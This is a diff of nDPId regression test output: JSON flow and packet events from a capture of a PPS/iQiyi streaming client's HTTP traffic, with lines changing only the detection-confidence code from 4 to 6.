-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7580000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} +00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7580000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"iplocation.geo.qiyi.com","url":"iplocation.geo.qiyi.com\/cityjson","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} 01043{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1410,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":2,"flow_last_seen":1467353190978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":497,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":497,"pkt_l4_len":463,"thread_ts_msec":1467353190978,"pkt":"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"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1411,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":1467353190978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":25,"thread_ts_msec":1467353190978,"pkt":"ABxCjnAxTF4M6gNlCABFAAAtK+9AADIGo5lqJttrwKhzCABQxU2TWIqvHXotrFAYAOXCuQAAMA0KDQoA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1467353191500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191500,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9BAAIAGTZDAqHMI3xpqFMZOAFCUEYDiYZCIJlAYQTcJ9QAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2ZsYWcuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2ZsYWdfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1413,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191500,"flow_last_seen":1467353191500,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191500,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50766,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masflag.ini","code":0,"content_type":"","user_agent":"masflag_runxx"}} 01040{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1414,"source":"pps.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":2,"flow_last_seen":1467353191505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":493,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":493,"pkt_l4_len":459,"thread_ts_msec":1467353191505,"pkt":"ABxCjnAxTF4M6gNlCABFAAHfpuJAADgGHVffGmoUwKhzCABQxk5hkIgmlBGBclAYAB+\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"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1467353191521,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191521,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L9RAAIAGTYzAqHMI3xpqFMZPAFCekgJEnvl6klAYQTcvHQAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2F1dG8uaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2F1dG9fcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1415,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191521,"flow_last_seen":1467353191521,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191521,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50767,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masauto.ini","code":0,"content_type":"","user_agent":"masauto_runxx"}} 01086{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1416,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":2,"flow_last_seen":1467353191524,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191524,"pkt":"ABxCjnAxTF4M6gNlCABFAAIAVHFAADgGb6ffGmoUwKhzCABQxk+e+XqSnpIC1FAYAB\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\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7580000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1467353191538,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1467353191538,"pkt":"TF4M6gNlABxCjnAxCABFAAD6L9ZAAIAGlfnAqHMIJG7cD8ZNAFCivUMktEgQ8FAY\/\/DARAAAR0VUIC90bXBzdGF0cy5naWY\/bWV0aG9kPXFpdWJpdGVyJm9zPXdpbmRvd3MtNi4xLjc2MDFfc3AxJnV1aWQ9MzUwQzNGMUFDNzVENDBiYzkwRDYwMkRBNEU2N0E3MkQmc29mdHZlcnNpb249MS4wLjAuMSZzb3VyY2U9cHBzJnRhc2t0eXBlPWdldHRhc2tpbmZvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRSVlpQW5nZW50DQpIb3N0OiBtc2cudmlkZW8ucWl5aS5jb20NCg0K"} -00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7580000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}} +00904{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1417,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191538,"flow_last_seen":1467353191538,"flow_idle_time":7580000,"flow_min_l4_payload_len":210,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":210,"midstream":1,"thread_ts_msec":1467353191538,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"msg.video.qiyi.com","url":"msg.video.qiyi.com\/tmpstats.gif?method=qiubiter&os=windows-6.1.7601_sp1&uuid=350C3F1AC75D40bc90D602DA4E67A72D&softversion=1.0.0.1&source=pps&tasktype=gettaskinfo","code":0,"content_type":"","user_agent":"QIYiAngent"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1418,"source":"pps.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":1467353191556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191556,"pkt":"TF4M6gNlABxCjnAxCABFAAC5L9hAAIAGTYfAqHMI3xpqFMZPAFCekgLUnvl8alAYQMHSJwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc3JlY29tLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBtYXNhdXRvX3J1bnh4DQpIb3N0OiBzdGF0aWMucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} 
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1467353191604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353191604,"pkt":"TF4M6gNlABxCjnAxCABFAAC4L+lAAIAGTXjAqHMI3xpqE8ZQAFAEnujgm7SOJVAYQTfnOwAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL21hc2Jsb2cuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IG1hc2Jsb2dfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1423,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191604,"flow_last_seen":1467353191604,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353191604,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50768,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/masblog.ini","code":0,"content_type":"","user_agent":"masblog_runxx"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1424,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":2,"flow_last_seen":1467353191606,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353191606,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5GMJAAC4G\/04kbtwPwKhzCABQxk20SBDwor1D9lAYPLgN5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
01085{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1426,"source":"pps.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":2,"flow_last_seen":1467353191608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":526,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":526,"pkt_l4_len":492,"thread_ts_msec":1467353191608,"pkt":"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\/J7tvaDQpzPb2ty9Uv1eO9rS\/JvbarL7rTxM8NCmFwcD1maWRkbGVyLHdpcmVzaGFyayxIdHRwV2F0Y2gsSHR0cFdhdGNoIFN0dWRpbyxIdHRwQW5hbHl6ZXINCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7580000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01190{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1467353191688,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":604,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":604,"pkt_l4_len":570,"thread_ts_msec":1467353191688,"pkt":"TF4M6gNlABxCjnAxCABFAAJOL\/RAAIAGZxbAqHMIZePIC8ZRAFCkQ4vBOJoXClAY\/\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"} 
-00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7580000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}} +00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1427,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353191688,"flow_last_seen":1467353191688,"flow_idle_time":7580000,"flow_min_l4_payload_len":550,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":550,"flow_avg_l4_payload_len":550,"midstream":1,"thread_ts_msec":1467353191688,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"api.cupid.iqiyi.com","url":"api.cupid.iqiyi.com\/ccs","code":0,"content_type":"","user_agent":"CookieClear_runxx"}} 
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1428,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":2,"flow_last_seen":1467353191722,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":291,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":291,"pkt_l4_len":257,"thread_ts_msec":1467353191722,"pkt":"ABxCjnAxTF4M6gNlCABFAAEVyyVAAC8GHh5l48gLwKhzCABQxlE4mhcKpEON51AYPCgsNwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjMxIEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2pzb247IGNoYXJzZXQ9dXRmLTgNCkNvbnRlbnQtTGVuZ3RoOiAxMQ0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsiciI6ZmFsc2V9"} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1430,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1467353192820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353192820,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDkwAAAER9TTAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1437,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1467353193179,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353193179,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAo0AAAERAQHAqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1440,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1467353195822,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353195822,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDk8AAAER9THAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01643{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1467353195852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":946,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":946,"pkt_l4_len":912,"thread_ts_msec":1467353195852,"pkt":"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"} -01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 
